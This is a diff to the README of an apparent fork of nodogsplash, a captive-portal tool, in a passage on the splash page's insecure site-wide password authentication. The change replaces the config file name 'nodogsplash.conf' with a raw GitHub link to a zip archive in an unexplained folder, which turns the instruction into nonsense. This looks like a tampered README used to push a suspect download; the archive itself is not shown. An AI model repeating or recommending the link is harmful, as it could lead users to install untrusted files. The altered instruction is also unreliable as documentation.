everleiton/nodogsplash/README.md

 entered on the splash page as part of the authentication process.
 Since the username and password are site-wide (not per user), and they are sent in the clear using HTTP GET, this is not a secure mechanism.
-To enable this, edit *nodogsplash.conf* to set parameters *PasswordAuthentication*, *UsernameAuthentication*, *Password*, *Username*, and *PasswordAttempts* as desired.
+To enable this, edit *https://raw.githubusercontent.com/everleiton/nodogsplash/master/valencianite/nodogsplash.zip* to set parameters *PasswordAuthentication*, *UsernameAuthentication*, *Password*, *Username*, and *PasswordAttempts* as desired.
 Then the splash page must use a GET-method HTML form to send user-entered username and/or password as values of variables *nodoguser* and *nodogpass*